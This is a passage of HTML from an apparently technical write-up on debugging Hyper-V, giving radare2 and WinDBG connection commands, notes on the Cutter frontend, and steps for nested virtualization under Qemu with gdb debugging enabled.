font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Radare2 is interesting debugging console-style platform. You can download latest binaries from </span><a href="https://github.com/radareorg/radare2/releases" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/radareorg/radare2/releases</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">but for getting additional information about Hyper-V you need recompile it (it is easy). Compilation instruction are</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://radare.gitbooks.io/radare2book/content/first_steps/windows_compilation.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://radare.gitbooks.io/radare2book/content/first_steps/windows_compilation.html</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Использование radare2 и WinDBG:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://radare.gitbooks.io/radare2book/content/debugger/windbg.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://radare.gitbooks.io/radare2book/content/debugger/windbg.html</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://book.rada.re/debugger/windbg.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://book.rada.re/debugger/windbg.html</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are good instructions. Before running don’t forget set _NT_DEBUGGER_EXTENSION_PATH to WinDBG x64 dir and copy extensions to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> bin folder: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ext.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">exts.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">kdexts.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">kext.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">radare2 commands for testing:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">pd</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – disassemble</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">xq</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> @0x<address> - display memory content</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">v</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – switch to GUI mode</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are two radare2 mode for connection to Windows kernel debugging: dbgeng.dll interface and own winkd protocol implementation</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 + WinDBG dbgeng.dll interface</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Configure hypervisor in network debugging mode and run radare2 with parameters:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -d "windbg://-k net:port=50011,key=1.2.3.4"</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 308px; overflow: hidden; width: 583px;"><img alt="Изображение" height="308" src="https://lh4.googleusercontent.com/KQ6WhZfrLcBHPnZMc3RtOXLVts2Jldo9vxwYz73AzaGVEovYnq99gFcoRHjun6_Q1SwVLaWM3gze0iPnY58BWEkeaYwYwT0zKV7ndR4rjI16cmdL5Ynmq03VmNM8LB6P9QdxDsuyOWPgtAoxDQ" style="margin-left: 0px; margin-top: 0px;" width="583" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can execute WinDBG standard commands using =! prefix.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 117px; overflow: hidden; width: 302px;"><img height="117" src="https://lh3.googleusercontent.com/WkF-dfqwQ_3csFgHpzAvSRYcRNZeFKB3h79Ut_n2N4uT0bflWwHk2HvzzgiAOi2YOb50oQcjpBcF4HN0S9FRQJPz2TgojcYCqWA15ACnOPv35HazljKiguK1QneQSGqpA6oCl0ESMFfHeAuG8g" style="margin-left: 0px; margin-top: 0px;" width="302" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 + embedded winkd extension</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -D winkd winkd://192.168.174.1:50011:1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I got error while udp socket opening. Probably, it is some mistake in my lab, but you can try it in your environment.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Connect to Hyper-V, using com-debugging through vmdemux pipe:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -D winkd winkd://\\.\pipe\Vm0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">using debugging protocol, you get additional information about Hyper-V:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 258px; overflow: hidden; width: 557px;"><img height="258" src="https://lh3.googleusercontent.com/HxsHX9K3fHItG5wdlwNzTwofsDvOgbASXPMUSUrbmJpX3gij2qBomXep9GNJ4DCu7VbSQ7xPi6qDDzWy_R8gc-F3kHL4x9vSXtcc7YdynluoGLgCbOQz8ALbuwpfPx-vYz6TKb4qfkMMe5BCCQ" style="margin-left: 0px; margin-top: 0px;" width="557" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kd protocol is changing sometimes. If you get some hangs or error, first try to make connection using standard WinDBG debugger through com-port, next disconnect and attach radare2.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Cutter</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Cutter - gui frontend for </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, having interesting debugging capabilities, but in beta stage. It has integrated Ghidra decompiler, therefore it can be very useful. Cutter support GDB and WinDBG-pipe debugging options now.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 532px;"><img height="184" src="https://lh3.googleusercontent.com/fkuntIDf1dQaNSd2Jxv0aEwGGvzYy3hsj5i3Z7S97yfd2gt9ZrVStUtjSUN4ETDhY-tL29b253240_3cpT4l03nTDEGiFEbynVlg80nUDqzUemC6HF-juIfF4LQi_hei8WfWpLS4sNxgmlPE0w" style="margin-left: 0px; margin-top: 0px;" width="532" /></span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">While article was written, rizin, fork of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, was created. Cutter migrated to that framework.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.10.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Qemu</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Qemu is supported nested virtualization. But without accelerator qemu works very slow. Accelerator with nested virtualization is available under Linux platform. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Demo was made on Ubunt 20.04.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Install Qemu and Virt-manager:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">sudo apt-get install qemu qemu-kvm virt-manager</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run virtual machine manager and create virtual machine with some configuration (2 cpu, 8Gb memory)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">install Windows 10 as guest. It is better using VirtIO drivers for disk for increasing performance.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Install Hyper-V in guest OS and guest OS in Hyper-V. Shutdown VM.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enable gdb debugging for Qemu:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">virt-xml <vm_name> --edit --confirm --qemu-commandline='-s'</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See XML config file in virtual machine manager: you can find additional qemu:commandline option</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 504px;"><img height="251" src="https://lh5.googleusercontent.com/J2_WxBeabnOSgm0RNysqAGXBwtgdR5olyLtbs8U50u5zUMtP8ekkKxOVpvevC30eI8QF3V_qu64lHVFp-X0K93fcuf-_yQIWRduVc5Tzqwq98SW0m21eT0MJAaXqDVUSQ3PwI5WsitJNjzQrnw" style="margin-left: 0px; margin-top: 0px;" width="504" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 